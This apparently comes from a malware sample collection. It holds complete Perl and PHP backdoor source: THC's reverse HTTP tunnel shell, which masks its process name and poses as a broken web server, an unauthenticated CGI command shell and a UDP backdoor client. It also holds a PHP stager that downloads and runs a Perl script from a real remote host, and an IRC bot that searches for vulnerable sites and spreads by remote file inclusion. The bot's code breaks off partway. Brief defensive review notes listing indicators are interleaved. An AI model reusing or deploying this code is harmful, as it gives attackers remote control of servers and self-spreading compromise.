# Proof-of-Concept Program for the paper "Placing Backdoors through Firewalls"
# available at the website above in the "Articles" section.
#
# Greets to all THC, ADM, arF and #bluebox guys
# verified to work on Linux, Solaris, AIX and OpenBSD
# BUGS: some Solaris machines: select(3) is broken, won't work there
# on some systems Perl's recv is broken :-( (AIX, OpenBSD) ...
# we can't make proper receive checks here. Workaround implemented.
#
# HISTORY:
# v1.6: included www-proxy authentication ;-))
# v1.4: porting to various unix types (and I thought perl'd be portable...)
# v1.3: initial public release of the paper including this tool
#
# GENERAL CONFIG (except for $MASK, everything must be the same
# for MASTER and SLAVE is this section!)
#
$CGI_PREFIX="/cgi-bin/order?"; # should look like cgi. "?" as last char!
$MASK="vi"; # for masking the program's process name
$PASSWORD="THC"; # anything, nothing you have to rememeber
# (not a real "password" anyway)
#
# MASTER CONFIG (specific for the MASTER)
#
$LISTEN_PORT=8080; # on which port to listen (80 [needs root] or 8080)
$SERVER="127.0.0.1"; # the host to run on (ip/dns) (the SLAVE needs this!)
#
# SLAVE CONFIG (specific for the SLAVE)
#
$SHELL="/bin/sh -i"; # program to execute (e.g. /bin/sh)
$DELAY="3"; # time to wait for output after your command(s)
#$TIME="00:01"; # time when to connect to the master (unset if now)
#$DAILY="yes"; # tries to connect once daily if set with something
#$PROXY="127.0.0.1"; # set this with the Proxy if you must use one
#$PROXY_PORT="3128"; # set this with the Proxy Port if you must use one
#$PROXY_USER="user"; # username for proxy authentication
#$PROXY_PASSWORD="pass"; # password for proxy authentication
#$DEBUG=""; # for debugging purpose, turn off when in production
$BROKEN_RECV="yes"; # For AIX & OpenBSD, NOT for Linux & Solaris
# END OF CONFIG # nothing for you to do after this point #
################## BEGIN MAIN CODE ##################
require 5.002;
use Socket;
$|=1; # next line changes our process name
if ($MASK) { for ($a=1;$a<80;$a++){$MASK=$MASK."\000";} $0=$MASK; }
undef $DAILY if (! $TIME);
if ( !($PROXY) || !($PROXY_PORT) ) {
undef $PROXY;
undef $PROXY_PORT;
}
$protocol = getprotobyname('tcp');
if ($ARGV[0] ne "") {
if ($ARGV[0] eq "-h") {
print STDOUT "no commandline option : daemon mode\n";
print STDOUT "using \"-h\" as option : this help\n";
print STDOUT "any other option : slave mode\n";
exit(0);
} else {
print STDOUT "starting in slave mode\n";
$SLAVE_MODE = "yeah";
}
}
if (! $SLAVE_MODE) {
&master;
} else {
&slave;
}
# END OF MAIN FUNCTION
############### SLAVE FUNCTION ###############
sub slave {
$pid = 0;
if ($PROXY) { # setting the real config (for Proxy Support)
$REAL_SERVER = $PROXY;
$REAL_PORT = $PROXY_PORT;
$REAL_PREFIX = "GET http://" . $SERVER . ":" . $LISTEN_PORT
. $CGI_PREFIX;
$PROXY_SUFFIX = "Pragma: no-cache\n";
if ( $PROXY_USER && USER_PASSWORD ) {
&base64encoding;
$PROXY_SUFFIX = $PROXY_SUFFIX . $PROXY_COOKIE;
}
} else {
$REAL_SERVER = $SERVER;
$REAL_PORT = $LISTEN_PORT;
$REAL_PREFIX = "GET " . $CGI_PREFIX;
}
AGAIN: if ($pid) { kill 9, $pid; }
if ($TIME) { # wait until the specified $TIME
$TIME =~ s/^0//; $TIME =~ s/:0/:/;
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" . $min;
while ($TIME ne $t) {
sleep(28); # every 28 seconds we look at the watch
(undef,$min,$hour,undef,undef,undef,undef,undef,undef)
= localtime(time);
$t=$hour . ":" .$min;
}
}
print STDERR "Slave activated\n" if $DEBUG;
if ($DAILY) { # if we must connect daily, we'll
if (fork) { # fork the daily shell process to
sleep(69); # ensure the master control process
goto AGAIN; # won't get stuck by a fucking cmd
} # the user executed.
print STDERR "forked\n" if $DEBUG;
}
$address = inet_aton($REAL_SERVER) || die "can't resolve server\n";
$remote = sockaddr_in($REAL_PORT, $address);
$forked = 0;
GO: close(THC);
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
if (! $forked) { # fork failed? fuck, let's try again
pipe R_IN, W_IN; select W_IN; $|=1;
pipe R_OUT, W_OUT; select W_OUT; $|=1;
$pid = fork;
if (! defined $pid) {
close THC;
close R_IN; close W_IN;
close R_OUT; close W_OUT;
goto GO;
}
$forked = 1;
}
if (! $pid) { # this is the child process (execs $SHELL)
close R_OUT; close W_IN; close THC;
print STDERR "forking $SHELL in child\n" if $DEBUG;
open STDIN, "<&R_IN";
open STDOUT, ">&W_OUT";
open STDERR, ">&W_OUT";
exec $SHELL || print W_OUT "couldn't spawn $SHELL\n";
close R_IN; close W_OUT;
exit(0);
} else { # this is the parent (data control + network)
close R_IN;
sleep($DELAY); # we wait $DELAY for the commands to complete
vec($rs, fileno(R_OUT), 1) = 1;
print STDERR "before: allwritten2stdin\n" if $DEBUG;
select($r = $rs, undef, undef, 30);
print STDERR "after : wait for allwritten2stdin\n" if $DEBUG;
sleep(1); # The following readin of the command output
$output = ""; # looks weird. It must be! every system
vec($ws, fileno(W_OUT), 1) = 1; # behaves different :-((
print STDERR "before: readwhiledatafromstdout\n" if $DEBUG;
while (select($w = $ws, undef, undef, 1)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : readwhiledatafromstdout\n" if $DEBUG;
print STDERR "before: fucksunprob\n" if $DEBUG;
vec($ws, fileno(W_OUT), 1) = 1;
while (! select(undef, $w=$ws, undef, 0.001)) {
read R_OUT, $readout, 1 || last;
$output = $output . $readout;
}
print STDERR "after : fucksunprob\n" if $DEBUG;
print STDERR "send 0byte to stdout, fail->exit\n" if $DEBUG;
print W_OUT "\000" || goto ENDE;
print STDERR "before: readallstdoutdatawhile!eod\n" if $DEBUG;
while (1) {
read R_OUT, $readout, 1 || last;
last if ($readout eq "\000");
$output = $output . $readout;
}
print STDERR "after : readallstdoutdatawhile!eod\n" if $DEBUG;
&uuencode; # does the encoding of the shell output
$encoded = $REAL_PREFIX . $encoded;
$encoded = $encoded . $PROXY_SUFFIX if ($PROXY);
$encoded = $encoded . "\n";
print STDERR "connecting to remote, fail->exit\n" if $DEBUG;
connect(THC, $remote) || goto ENDE; # connect to master
print STDERR "send encoded data, fail->exit\n" if $DEBUG;
send (THC, $encoded, 0) || goto ENDE; # and send data
$input = "";
vec($rt, fileno(THC), 1) = 1; # wait until master sends reply
print STDERR "before: wait4answerfromremote\n" if $DEBUG;
while (! select($r = $rt, undef, undef, 0.00001)) {}
print STDERR "after : wait4answerfromremote\n" if $DEBUG;
print STDERR "read data from socket until eod\n" if $DEBUG;
$error="no";
while (1) { # read until EOD (End Of Data)
print STDERR "?" if $DEBUG;
# OpenBSD 2.2 can't recv here! can't get any data! sucks ...
recv (THC, $readin, 1, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) { goto OK; }
print STDERR "!" if $DEBUG;
goto OK if (($readin eq "\000") or ($readin eq "\n")
or ($readin eq ""));
$input = $input . $readin;
}
OK: print STDERR "\nall data read, entering OK\n" if $DEBUG;
$input =~ s/\n//gs;
&uudecode; # decoding the data from the master
print STDERR "if password not found -> exit\n" if $DEBUG;
goto ENDE if ( $decoded =~ m/^$PASSWORD/s == 0);
$decoded =~ s/^$PASSWORD//;
print STDERR "writing input data to $SHELL\n" if $DEBUG;
print W_IN "$decoded" || goto ENDE; # sending the data
sleep(1); # to the shell proc.
print STDERR "jumping to GO\n" if $DEBUG;
goto GO;
}
ENDE: kill 9, $pid; $pid = 0;
exit(0);
} # END OF SLAVE FUNCTION
############### MASTER FUNCTION ###############
sub master {
socket(THC, &PF_INET, &SOCK_STREAM, $protocol)
or die "can't create socket\n";
setsockopt(THC, SOL_SOCKET, SO_REUSEADDR, 1);
bind(THC, sockaddr_in($LISTEN_PORT, INADDR_ANY)) || die "can't bind\n";
listen(THC, 3) || die "can't listen\n"; # print the HELP
print STDOUT '
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it\'s output and then
type in your commands to execute on SLAVE. You\'ll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn\'t try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don\'t like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.
';
YOP: print STDOUT "\nWaiting for connect ...";
$remote=accept (S, THC) || goto YOP; # get the connection
($r_port, $r_slave)=sockaddr_in($remote); # and print the SLAVE
$slave=gethostbyaddr($r_slave, AF_INET); # data.
$slave="unresolved" if ($slave eq "");
print STDOUT " connect from $slave/".inet_ntoa($r_slave).":$r_port\n";
select S; $|=1;
select STDOUT; $|=1;
$input = "";
vec($socks, fileno(S), 1) = 1;
$error="no";
while (1) { # read the data sent by the slave
while (! select($r = $socks, undef, undef, 0.00001)) {}
recv (S, $readin, 80, 0) || undef $error;
if ((! $error) and (! $BROKEN_RECV)) {
print STDOUT "[disconnected]\n";
}
$readin =~ s/\r//g;
$input = $input . $readin;
last if ( $input =~ m/\n\n/s );
}
&hide_as_broken_webserver if ( $input =~ m/$CGI_PREFIX/s == 0 );
$input =~ s/^.*($CGI_PREFIX)\??//s;
$input =~ s/\n.*$//s;
&uudecode; # decoding the data from the slave
&hide_as_broken_webserver if ( $decoded =~ m/^$PASSWORD/s == 0 );
$decoded =~ s/^$PASSWORD//s;
$decoded = "[Warning! No output from remote!]\n>" if ($decoded eq "");
print STDOUT "$decoded"; # showing the slave output to the user
$output = <STDIN>; # and get his input.
&uuencode; # encode the data for the slave
send (S, $encoded, 0) || die "\nconnection lost!\n"; # and send it
close (S);
print STDOUT "sent.\n";
goto YOP; # wait for the next connect from the slave
} # END OF MASTER FUNCTION
###################### MISC. FUNCTIONS #####################
sub uuencode { # does the encoding stuff for error-free data transfer via WWW
$output = $PASSWORD . $output; # PW is for error checking and
$uuencoded = pack "u", "$output"; # preventing sysadmins from
$uuencoded =~ tr/'\n)=(:;&><,#$*%]!\@"`\\\-' # sending you weird
/'zcadefghjklmnopqrstuv' # data. No real
/; # security!
$uuencoded =~ tr/"'"/'b'/;
if ( ($PROXY) && ($SLAVE_MODE) ) {# proxy drops request if > 4kb
$codelength = (length $uuencoded) + (length $REAL_PREFIX) +12;
$cut_length = 4099 - (length $REAL_PREFIX);
$uuencoded = pack "a$cut_length", $uuencoded
if ($codelength > 4111);
}
$encoded = $uuencoded;
$encoded = $encoded . " HTTP/1.0\n" if ($SLAVE_MODE);
} # END OF UUENCODE FUNCTION
sub uudecode { # does the decoding of the data stream
$input =~ tr/'zcadefghjklmnopqrstuv'
/'\n)=(:;&><,#$*%]!\@"`\\\-'
/;
$input =~ tr/'b'/"'"/;
$decoded = unpack "u", "$input";
} # END OF UUDECODE FUNCTION
sub base64encoding { # does the base64 encoding for proxy passwords
$encode_string = $PROXY_USER . ":" . $PROXY_PASSWORD;
$encoded_string = substr(pack('u', $encode_string), 1);
chomp($encoded_string);
$encoded_string =~ tr|` -_|AA-Za-z0-9+/|;
$padding = (3 - length($encode_string) % 3) % 3;
$encoded_string =~ s/.{$padding}$/'=' x $padding/e if $padding;
$PROXY_COOKIE = "Proxy-authorization: Basic " . $encoded_string . "\n";
} # END OF BASE64ENCODING FUNCTION
sub hide_as_broken_webserver { # invalid request -> look like broken server
send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
"<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
close S;
print STDOUT "Warning! Illegal server access!\n"; # report to user
goto YOP;
} # END OF HIDE_AS_BROKEN_WEBSERVER FUNCTION
# END OF PROGRAM # (c) 1998 by <vh@reptile.rug.ac.be>


@ -0,0 +1,93 @@
############################################################
## Network security team ##
############################################################
##Coder: Ins ##
############################################################
##Ob dannom scripte: Eto prostoj shell napisannyj na perle##
############################################################
#V celjah nesankcionirovannogo dostupa smeni etot parol`"
#$pwd='';
print "Content-type: text/html\n\n";
&read_param();
if (!defined$param{dir}){$param{dir}="/"};
if (!defined$param{cmd}){$param{cmd}="ls -la"};
##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##
print << "[ins1]";
<head>
<title>::Network Security Team::</title>
<font size=3 face=verdana><b>Network security team :: CGI Shell</b>
<font size=-2 face=verdana><br><br>
<style>
BODY, TD { font-family: Tahoma; font-size: 12px; }
INPUT.TEXT {
font-family : Arial;
font-size : 8pt;
color : Black;
width : 100%;
background-color : #F1F1F1;
border-style : solid;
border-width : 0px;
border-color : Silver;
}
INPUT.BUTTON {
font-family : Arial;
font-size : 8pt;
width : 100px;
border-width : 1px;
color : Black;
background-color : D1D1D1;
border-color : silver;
border-style : solid;
}
</style>
</head>
<body bgcolor=#B9B9B9>
Vvedite zapros:
<table width=500 bgcolor=D9D9D9><tr><td>
[ins1]
print "cd $param{dir}&&$param{cmd}";
print << "[ins2]";
</td></tr></table>
Otvet na zapros:
<table width=500 bgcolor=D9D9D9><tr><td><pre>
[ins2]
#if ($param{pwd} ne $pwd){print "Nepravelnij user";}
open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|");
while ($line=<FILEHANDLE>){print "$line";};
close (FILEHANDLE);
print << "[ins3]";
</pre></td></tr></table>
<form action=pshell.cgi>
DIR dlja sledujushego zaprosa:
<input type=text class="TEXT" name=dir value=$param{dir}>
Sledujushij zapros:
<input type=text class="TEXT" name=cmd value=$param{cmd}>
<input type=submit class="button" value="Submit">
<input type=reset class="button" value="Reset">
</form>
</body>
</html>
[ins3]
sub read_param {
$buffer = "$ENV{'QUERY_STRING'}";
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$value =~ s/\+/ /g;
$value =~ s/%20/ /g;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$param{$name} = $value;
}
}
#########################<<KONEC>>#####################################
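Review bot: The sample is an unauthenticated command-execution CGI: `read_param` at the bottom of the file URL-decodes `dir` and `cmd` from `QUERY_STRING`, and those values go straight into the two-argument pipe `open(FILEHANDLE, "cd $param{dir}&&$param{cmd}|")`, while the only gate, the `$pwd` comparison, is commented out on the line above it (as is the `$pwd` assignment near the top). The decoded values are also echoed unquoted into the form's `value=` attributes. Static fingerprints for this file are the title `::Network Security Team::`, the banner `Network security team :: CGI Shell`, the `[ins1]`/`[ins2]`/`[ins3]` heredoc terminators and the form action `pshell.cgi`; at runtime the web server's CGI process spawns a shell whose command line begins with `cd … &&`, which is the behavioural signal to alert on.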


@ -0,0 +1,48 @@
use IO::Socket;
use Getopt::Std;
getopts('s:p:h', \%opt)||die("Error: Unable to get command line options !!!\n");
if(defined($opt{'h'})) { \&usage() }
if(defined($opt{'s'})) { $server=$opt{'s'} } else { \&usage() }
if(defined($opt{'p'})) { $port=$opt{'p'} } else { \&usage() }
$|=1;
$maxlen=1024;
$sock=IO::Socket::INET->new(Proto=>'udp')
or die("Error: Cannot initialize socket !!!\n");
$ipaddr=inet_aton($server);
$portaddr=sockaddr_in($port, $ipaddr);
print("\nAUDP Backdoor started.\n");
print("======================\n");
while(1) {
print("=> ");
$mesg=<STDIN>;
chomp $mesg;
if($mesg=~/^\s*(exit)|(quit)\s*/i) { exit(0) }
if($mesg!~/^\s*$/) {
send($sock, $mesg."\n", 0, $portaddr)==length($mesg."\n");
while($portaddr=recv($sock, $msg, $maxlen, 0)) {
if($msg=~/^\-end\.$/) { last } else {
print $msg;
}
}
}
}
sub usage() {
print("\nAUDP - Programmed by Anarchy\n");
print("============================\n");
print("Usage: AUDP -s <host> -p <port>\n\n");
exit 1;
}
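Review bot: The three option checks write `\&usage()`, which takes a reference to `usage` and discards it instead of calling it, so `-h` and a missing `-s` or `-p` never print the usage text and execution continues with `$server` or `$port` undefined. The `send(...)==length(...)` comparison inside the loop is likewise evaluated in void context and its result is never checked. From a network point of view the sample carries plain-text command lines over UDP and expects the peer to terminate each response with a line reading exactly `-end.`, which is the on-wire marker to look for; this file only prints what it receives, so the companion listener is presumably elsewhere in the corpus.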

1905
Perl/Backdoor.Perl.IRCBot.aa Normal file


1721
Perl/Backdoor.Perl.IRCBot.ac Normal file


2578
Perl/Backdoor.Perl.IRCBot.af Normal file



1860
Perl/Backdoor.Perl.IRCBot.n Normal file


119
Perl/Backdoor.Perl.IRCBot.p Normal file

@ -0,0 +1,119 @@
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir);
shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp; wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
system('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;wget http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;curl -O http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lwp-download http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;lynx -source http://inteligent.freehostia.com/21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;fetch http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
passthru('cd /tmp;GET http://inteligent.freehostia.com/21.txt>21.txt;perl 21.txt;rm -rf 21.txt');
shell_exec('cd /tmp;rm -rf 21.txt*');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt**');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt*');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
shell_exec('cd /tmp;rm -rf 21.txt**');
system('cd /tmp;rm -rf 21.txt**');
passthru('cd /tmp;rm -rf 21.txt**');
if ($free === FALSE) {$free = 0;}
if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}
else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
else {$size = $size . " B";}
return $size;
}
}
exit;
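Review bot: Despite the `Perl/` path and `.p` suffix this file is PHP (it opens with `<?` and calls `shell_exec`, `system` and `passthru`); it is a stager that fetches `21.txt` from `inteligent.freehostia.com` into `/tmp`, runs it with `perl` and deletes it, trying every downloader it can find (`wget`, `curl`, `lwp-download`, `lynx`, `fetch`, `GET`) through each of the three execution functions, twice over, before printing `id` output and free disk space. The hostname, the `/tmp/21.txt` path and the pattern of a web-server process spawning a downloader followed by `perl` on a file in `/tmp` are the indicators this block gives a defender; the trailing `rm -rf 21.txt*` lines are clean-up, so the downloaded file is not expected to persist on disk. `ex` prefixes every call with `@`, so download or execution failures are silent and the page output alone does not show whether the second stage actually ran.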

1333
Perl/Backdoor.Perl.IRCBot.r Normal file


1265
Perl/Backdoor.Perl.IRCBot.t Normal file


1075
Perl/Backdoor.Perl.IRCBot.v Normal file


487
Perl/Backdoor.Perl.IRCBot.w Normal file

@ -0,0 +1,487 @@
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?";
my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??";
my $nick = "UnIx|".(int(rand(99)));
my $ident = "xpl";
my $chan = "#r4k3t";
my $server = "211.21.73.10";
my $http = "Googlebot";
my $port = 6667;
my $sock;
my $proxy = 30;
my $admin = "SuPrEmO";
my $stringa = "!scan";
my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?";
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&irc($nick,$ident,$chan,$server,$port);
}else{
exit(0);
}
sub irc(){
my($nick,$ident,$chan,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nick."\r\n";
print $sock "USER ".$ident." 8 * : By SISTEM\r\n";
print $sock "JOIN ".$chan."\r\n";
while( $cmdline = <$sock> ){
if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) {
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}
if ($cmdline =~ /PRIVMSG $chan :!info/){
&privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork");
}
if ($cmdline =~ /PRIVMSG $chan :!outbye/){
exit(0);
}
if($cmdline =~ /^PING \:(.*)/){
print $sock "PONG :$1";
}
}
}
sub scan(){
my($bug,$dork)=@_;
my $contatore = 0;
&privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug);
&privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork);
my @proc;
$proc[9] = fork();
if($proc[9] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork)));
exit;
}
$proc[1] = fork();
if($proc[1] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork)));
exit;
}
$proc[2] = fork();
if($proc[2] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork)));
exit;
}
$proc[3] = fork();
if($proc[3] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork)));
exit;
}
$proc[4] = fork();
if($proc[4] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork)));
exit;
}
$proc[5] = fork();
if($proc[5] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork)));
exit;
}
$proc[6] = fork();
if($proc[6] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork)));
exit;
}
$proc[7] = fork();
if($proc[7] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork)));
exit;
}
$proc[8] = fork();
if($proc[8] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork)));
exit;
}
waitpid($proc[9],0);
waitpid($proc[1],0);
waitpid($proc[2],0);
waitpid($proc[3],0);
waitpid($proc[4],0);
waitpid($proc[5],0);
waitpid($proc[6],0);
waitpid($proc[7],0);
waitpid($proc[8],0);
my @links = &GetLink();
my @forks;
my $forked++;
&privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links));
my @uni = &Unici(@links);
&privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $sito (@uni){
$contatore++;
my $link = "http://" . $sito . $bug . $cmd . "?";
my $link = "http://" . $sito . $bug . $spread . "?";
if($contatore %$proxy == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
my $htmlsito = &Query($link,"3");
if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){
&privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?");
}
elsif($htmlsito =~ /JaheeM/){
&privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?");
}
exit(0);
}
if($contatore %200 == 0){
&privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx);
}
$startx++;
}
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
&privmsg($chan,"9[10Ricerca4]:".$bug .$dork);
&privmsg($chan,"9[10Ricerca4]: 7Fine.");
}
sub privmsg(){
my ($cha,$cosi)=@_;
print $sock "PRIVMSG ".$cha." :".$cosi."\r\n";
}
sub Google(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my @dom = &GoogleDomains();
my $file = "google.txt";
my $html;
my @result;
foreach my $dominio (@dom){
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N");
}
}
while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"/g){
$1 =~ /google/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Yahoo(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "yahoo.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start);
}
while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){
$1 =~ /yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Altavista(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "altavista.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
